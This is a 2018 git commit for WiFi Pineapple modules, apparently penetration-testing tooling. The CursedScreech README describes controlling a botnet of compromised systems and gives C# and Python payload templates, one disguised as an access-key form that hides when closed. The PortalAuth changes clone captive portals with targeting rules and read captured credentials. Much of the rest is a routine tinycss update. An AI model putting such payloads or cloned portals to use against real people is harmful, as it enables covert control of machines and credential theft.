Portal Auth and Cursed Screech Updates

This commit is contained in:
sud0nick 2018-07-15 23:51:02 -04:00
parent ae53ba8ea1
commit 5189bc5bc3
76 changed files with 2585 additions and 5974 deletions

66
CursedScreech/README.md Normal file
View File

@ -0,0 +1,66 @@
# CursedScreech
A mass communicator module for the WiFi Pineapple that utilizes TLS to control a botnet of compromised systems. Included is a C# API and Python API (with documentation) to write payloads that can communicate with CursedScreech and PortalAuth.
# APIs
I recommend using C# over Python to build your payload. Both APIs are really simple to use but using C# will allow you to create a self-contained executable along with required keys/certificates. Writing your payload in Python will require you to freeze your code and it can be difficult, if not impossible, to include all required files in a single executable. If you can't make a single executable you will have to find a way to move the whole dist directory to the target machine.
### C# API Example
```
using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;
namespace Payload
{
public partial class Form1 : Form {
PA_Authorization pauth = new PA_Authorization();
public Form1() {
InitializeComponent();
CursedScreech cs = new CursedScreech();
cs.startMulticaster("231.253.78.29", 19578);
cs.setRemoteCertificateSerial("EF-BE-AD-DE");
cs.setRemoteCertificateHash("1234567890ABCDEF");
cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
e.Cancel = true;
this.Hide();
}
private void accessKeyButton_Click(object sender, EventArgs e) {
// Request an access key from the Pineapple
string key = pauth.getAccessKey();
// Check if a key was returned
string msg;
if (key.Length > 0) {
msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
}
else {
msg = "Failed to retrieve an access key from the server. Please try again later.";
}
// Display message to the user
MessageBox.Show(msg);
}
}
}
```
### Python API Example
```
from PineappleModules import CursedScreech
cs = CursedScreech("Network Client")
cs.startMulticaster("231.253.78.29", 19578)
cs.setRemoteCertificateSerial("ABCDEF1234567890")
cs.startSecureServerThread("payload.pem", "payload.cer", "cursedscreech.cer")
```

View File

@ -165,6 +165,14 @@ class CursedScreech extends Module {
return false;
}
}
if (!file_exists(__TARGETLOGS__)) {
if (!mkdir(__TARGETLOGS__, 0755, true)) {
$this->logError("Failed init", "Failed to initialize because the targetlogs directory at '" . __TARGETLOGS__ . "' could not be created.");
$this->respond(false);
return false;
}
}
}
/* ============================ */

View File

@ -0,0 +1,4 @@
July 15, 2018
<br /><br />
- Added check for targetlogs directory at startup<br />

View File

@ -6,5 +6,5 @@
"tetra"
],
"title": "CursedScreech",
"version": "1.4"
"version": "1.5"
}

2
PortalAuth/README.md Normal file
View File

@ -0,0 +1,2 @@
# PortalAuth
Captive portal cloner and payload distributor for the WiFi Pineapple NANO and TETRA

View File

@ -11,11 +11,11 @@ define('__LOGS__', __INCLUDES__ . "logs/");
define('__HELPFILES__', __INCLUDES__ . "help/");
define('__CHANGELOGS__', __INCLUDES__ . "changelog/");
define('__SCRIPTS__', __INCLUDES__ . "scripts/");
// Injection set defines
define('__INJECTS__', __SCRIPTS__ . "injects/");
define('__SKELETON__', __SCRIPTS__. "skeleton/");
// NetClient defines
define('__DOWNLOAD__', "/www/download/");
define('__WINDL__', __DOWNLOAD__ . "windows/");
@ -25,6 +25,7 @@ define('__IOSDL__', __DOWNLOAD__ . "ios/");
// PASS defines
define('__PASSDIR__', __INCLUDES__ . "pass/");
define('__KEYDIR__', __PASSDIR__ . "keys/");
define('__PASSSRV__', __PASSDIR__ . "pass.py");
define('__PASSBAK__', __PASSDIR__ . "Backups/pass.py");
define('__PASSLOG__', __PASSDIR__ . "pass.log");
@ -240,7 +241,14 @@ class PortalAuth extends Module
private function init() {
if (!file_exists(__LOGS__)) {
if (!mkdir(__LOGS__, 0755, true)) {
$this->respond(false, "Failed to create logs directory");
$this->respond(false, "Failed to create logs directory at " . __LOGS__);
return false;
}
}
if (!file_exists(__KEYDIR__)) {
if (!mkdir(__KEYDIR__, 0755, true)) {
$this->logError("Failed init", "Failed to initialize because the keys directory at '" . __KEYDIR__ . "' could not be created.");
$this->respond(false);
return false;
}
}
@ -284,7 +292,13 @@ class PortalAuth extends Module
//======================//
private function checkIsOnline() {
$this->respond(checkdnsrr("wifipineapple.com", "A"));
$connected = @fsockopen("www.wifipineapple.com", 443);
if ($connected) {
fclose($connected);
$this->respond(true);
return true;
}
$this->respond(false);
}
private function getCapturedCreds() {
if (file_exists(__AUTHLOG__)) {

View File

@ -0,0 +1,6 @@
July 15, 2018
<br /><br />
- Added check for keys directory at startup<br />
- Updated TinyCSS lib to v0.4<br />
- Updated format of cloned portals to function with the latest Evil Portal<br />
- Added Basic and Targeted portal types for cloned portals<br />

View File

@ -25,3 +25,4 @@ Select these checkboxes to modify the cloned portal.<br /><br />
<strong>Inject JS:</strong> Injects the JavaScript from the selected Injection Set into the portal.<br />
<strong>Inject CSS:</strong> Injects the CSS from the selected Injection Set into the portal.<br />
<strong>Inject HTML:</strong> Injects the HTML from the selected Injection Set into the portal.<br />
<strong>Targeted Portal:</strong> Makes the cloned portal a targeted portal in the Evil Portal module.<br />

View File

@ -21,7 +21,7 @@ from bs4 import BeautifulSoup
class PortalCloner:
def __init__(self, portalName, directory, injectSet):
def __init__(self, portalName, directory, injectSet, targeted):
self.portalName = portalName
self.portalDirectory = directory + self.portalName + "/"
self.resourceDirectory = self.portalDirectory + "resources/"
@ -33,6 +33,7 @@ class PortalCloner:
self.session = requests.Session()
self.basePath = '/pineapple/modules/PortalAuth/'
self.uas = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}
self.targeted = targeted
def find_meta_refresh(self, r):
@ -302,10 +303,16 @@ class PortalCloner:
# Copy the MyPortal PHP script to portalDirectory
shutil.copy(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/MyPortal.php', self.portalDirectory)
# Copy the helper PHP script to portalDirectory
shutil.copy(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/helper.php', self.portalDirectory)
# Create the required .ep file
with open(self.portalDirectory + self.portalName + ".ep", 'w+') as epFile:
epFile.write("DO NOT DELETE THIS")
if self.targeted:
epFile.write("{\"name\":\"" + self.portalName + "\",\"type\":\"targeted\",\"targeted_rules\":{\"default\":\"default.php\",\"rule_order\":[\"mac\",\"ssid\",\"hostname\",\"useragent\"],\"rules\":{\"mac\":{\"exact\":[],\"regex\":[]},\"ssid\":{\"exact\":[],\"regex\":[]},\"hostname\":{\"exact\":[],\"regex\":[]},\"useragent\":{\"exact\":[],\"regex\":[]}}}}")
else:
epFile.write("{\"name\":\"" + self.portalName + "\",\"type\":\"basic\"}")
# Copy jquery to the portal directory
shutil.copy(self.basePath + 'includes/scripts/jquery-2.2.1.min.js', self.portalDirectory)

View File

@ -11,10 +11,10 @@ class MyPortal extends Portal
// Check for other form data here
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -11,10 +11,10 @@ class MyPortal extends Portal
// Check for other form data here
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -9,10 +9,10 @@ class MyPortal extends Portal
parent::handleAuthorization();
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -9,10 +9,10 @@ class MyPortal extends Portal
parent::handleAuthorization();
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
 * getClientMac
 * Gets the MAC address of a client from its IP address by searching
 * the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The MAC address, or an empty string if not found
 */
function getClientMac($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
 * getClientSSID
 * Gets the SSID a client is associated with, looked up by its IP address.
 * @param $clientIP : The client's IP address
 * @return string The SSID, or an empty string if not found
 */
function getClientSSID($clientIP)
{
    // Get the client's MAC address; the PineAP log is keyed by MAC, not IP
    $mac = getClientMac($clientIP);
    // Get the directory that contains the PineAP log
    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
    // Escape both file-derived values before building the shell command.
    // Without escaping, an empty $mac makes the log path the grep pattern
    // and leaves grep reading stdin (hang); a path with spaces word-splits.
    return trim(exec("grep " . escapeshellarg($mac) . " " . escapeshellarg($pineAPLogPath . "pineap.log") . " | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
 * getClientHostName
 * Gets the host name of a connected client from its IP address by
 * searching the dnsmasq lease file.
 * @param $clientIP : The client's IP address
 * @return string The host name, or an empty string if not found
 */
function getClientHostName($clientIP)
{
    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -1,8 +1,8 @@
Metadata-Version: 1.1
Name: tinycss
Version: 0.3
Version: 0.4
Summary: tinycss is a complete yet simple CSS parser for Python.
Home-page: http://packages.python.org/tinycss/
Home-page: http://tinycss.readthedocs.io/
Author: Simon Sapin
Author-email: simon.sapin@exyr.org
License: BSD
@ -13,6 +13,7 @@ Description: tinycss: CSS parser for Python
syntax and error handling for CSS 2.1 as well as some CSS 3 modules:
* CSS Color 3
* CSS Fonts 3
* CSS Paged Media 3
It is designed to be easy to extend for new CSS modules and syntax,
@ -21,7 +22,7 @@ Description: tinycss: CSS parser for Python
Quick facts:
* Free software: BSD licensed
* Compatible with Python 2.6+ and 3.x
* Compatible with Python 2.7 and 3.x
* Latest documentation `on python.org`_
* Source, issues and pull requests `on Github`_
* Releases `on PyPI`_
@ -33,12 +34,14 @@ Description: tinycss: CSS parser for Python
.. _on PyPI: http://pypi.python.org/pypi/tinycss
Platform: UNKNOWN
Classifier: Development Status :: 3 - Alpha
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: BSD License
Classifier: Programming Language :: Python :: 2
Classifier: Programming Language :: Python :: 2.6
Classifier: Programming Language :: Python :: 2.7
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.1
Classifier: Programming Language :: Python :: 3.2
Classifier: Programming Language :: Python :: 3.3
Classifier: Programming Language :: Python :: 3.4
Classifier: Programming Language :: Python :: 3.5
Classifier: Programming Language :: Python :: Implementation :: CPython
Classifier: Programming Language :: Python :: Implementation :: PyPy

View File

@ -1,11 +1,12 @@
.coveragerc
.gitignore
.travis.yml
CHANGES
LICENSE
MANIFEST.in
README.rst
setup.cfg
setup.py
tox.ini
docs/changelog.rst
docs/conf.py
docs/css3.rst
@ -19,6 +20,7 @@ tinycss/__init__.py
tinycss/color3.py
tinycss/css21.py
tinycss/decoding.py
tinycss/fonts3.py
tinycss/page3.py
tinycss/parsing.py
tinycss/speedups.c
@ -29,6 +31,7 @@ tinycss/version.py
tinycss.egg-info/PKG-INFO
tinycss.egg-info/SOURCES.txt
tinycss.egg-info/dependency_links.txt
tinycss.egg-info/requires.txt
tinycss.egg-info/top_level.txt
tinycss/tests/__init__.py
tinycss/tests/speed.py
@ -36,5 +39,6 @@ tinycss/tests/test_api.py
tinycss/tests/test_color3.py
tinycss/tests/test_css21.py
tinycss/tests/test_decoding.py
tinycss/tests/test_fonts3.py
tinycss/tests/test_page3.py
tinycss/tests/test_tokenizer.py

View File

@ -0,0 +1,6 @@
[test]
pytest-runner
pytest-cov
pytest-flake8
pytest-isort

View File

@ -0,0 +1,10 @@
[run]
branch = True
[report]
exclude_lines =
pragma: no cover
def __repr__
except ImportError
omit =
tinycss/tests/speed.py

View File

@ -0,0 +1,12 @@
*.pyc
*.c
*.so
*.egg-info
/.coverage
/htmlcov
/build
/dist
/.tox
/MANIFEST
/docs/_build
/env

View File

@ -0,0 +1,16 @@
language: python
python:
- "2.7"
- "3.3"
- "3.4"
- "3.5"
- "pypy"
- "pypy3"
install:
- pip install Cython
- pip install --upgrade -e .[test]
script:
- python setup.py test

View File

@ -0,0 +1,53 @@
tinycss changelog
=================
Version 0.4
-----------
Released on 2016-09-23.
* Add an __eq__ operator to Token object.
* Support Fonts 3.
Version 0.3
-----------
Released on 2012-09-18.
* Fix a bug when parsing \5c (an escaped backslash.)
Version 0.2
-----------
Released on 2012-04-27.
**Breaking changes:**
* Remove the ``selectors3`` module. The functionality has moved to the
`cssselect <http://packages.python.org/cssselect/>`_ project.
* Simplify the API for :func:`~tinycss.make_parser`.
Version 0.1.1
-------------
Released on 2012-04-06.
Bug fixes:
* Error handling on unexpected end of stylesheet in an at-rule head
* Fix the installation on ASCII-only locales
Version 0.1
-----------
Released on 2012-04-05.
First release. Parser support for CSS 2.1, Selectors 3, Color 3 and
Paged Media 3.

View File

@ -0,0 +1,31 @@
Copyright (c) 2012 by Simon Sapin.
Some rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* The names of the contributors may not be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

View File

@ -0,0 +1,3 @@
include README.rst CHANGES LICENSE tox.ini .coveragerc tinycss/speedups.c
recursive-include docs *
prune docs/_build

View File

@ -0,0 +1,47 @@
Metadata-Version: 1.1
Name: tinycss
Version: 0.4
Summary: tinycss is a complete yet simple CSS parser for Python.
Home-page: http://tinycss.readthedocs.io/
Author: Simon Sapin
Author-email: simon.sapin@exyr.org
License: BSD
Description: tinycss: CSS parser for Python
==============================
*tinycss* is a complete yet simple CSS parser for Python. It supports the full
syntax and error handling for CSS 2.1 as well as some CSS 3 modules:
* CSS Color 3
* CSS Fonts 3
* CSS Paged Media 3
It is designed to be easy to extend for new CSS modules and syntax,
and integrates well with cssselect_ for Selectors 3 support.
Quick facts:
* Free software: BSD licensed
* Compatible with Python 2.7 and 3.x
* Latest documentation `on python.org`_
* Source, issues and pull requests `on Github`_
* Releases `on PyPI`_
* Install with ``pip install tinycss``
.. _cssselect: http://packages.python.org/cssselect/
.. _on python.org: http://packages.python.org/tinycss/
.. _on Github: https://github.com/SimonSapin/tinycss/
.. _on PyPI: http://pypi.python.org/pypi/tinycss
Platform: UNKNOWN
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: BSD License
Classifier: Programming Language :: Python :: 2
Classifier: Programming Language :: Python :: 2.7
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.3
Classifier: Programming Language :: Python :: 3.4
Classifier: Programming Language :: Python :: 3.5
Classifier: Programming Language :: Python :: Implementation :: CPython
Classifier: Programming Language :: Python :: Implementation :: PyPy

View File

@ -0,0 +1,26 @@
tinycss: CSS parser for Python
==============================
*tinycss* is a complete yet simple CSS parser for Python. It supports the full
syntax and error handling for CSS 2.1 as well as some CSS 3 modules:
* CSS Color 3
* CSS Fonts 3
* CSS Paged Media 3
It is designed to be easy to extend for new CSS modules and syntax,
and integrates well with cssselect_ for Selectors 3 support.
Quick facts:
* Free software: BSD licensed
* Compatible with Python 2.7 and 3.x
* Latest documentation `on python.org`_
* Source, issues and pull requests `on Github`_
* Releases `on PyPI`_
* Install with ``pip install tinycss``
.. _cssselect: http://packages.python.org/cssselect/
.. _on python.org: http://packages.python.org/tinycss/
.. _on Github: https://github.com/SimonSapin/tinycss/
.. _on PyPI: http://pypi.python.org/pypi/tinycss

View File

@ -0,0 +1,24 @@
div.body {
text-align: left;
}
div.document p, div.document ul {
margin-top: 0;
margin-bottom: 1em;
}
div.document ul ul {
margin-top: 0;
margin-bottom: .5em;
}
.field-name {
padding-right: .5em;
}
table.field-list p, table.field-list ul {
margin-bottom: .5em;
}
table {
border-collapse: collapse;
margin-bottom: 1em;
}
table.docutils td, table.docutils th {
padding: .2em .5em;
}

View File

@ -0,0 +1,4 @@
{% extends "!layout.html" %}
{% block extrahead %}
<link rel="stylesheet" href="{{ pathto('_static/custom.css', 1) }}" />
{% endblock %}

View File

@ -0,0 +1 @@
.. include:: ../CHANGES

View File

@ -0,0 +1,252 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# tinycss documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 27 14:20:34 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx',
'sphinx.ext.viewcode', 'sphinx.ext.doctest']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'tinycss'
copyright = '2012, Simon Sapin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
#release = '0.1dev'
import re
with open(os.path.join(os.path.dirname(__file__), '..',
'tinycss', 'version.py')) as init_py:
release = re.search("VERSION = '([^']+)'", init_py.read()).group(1)
# The short X.Y version.
version = release.rstrip('dev')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
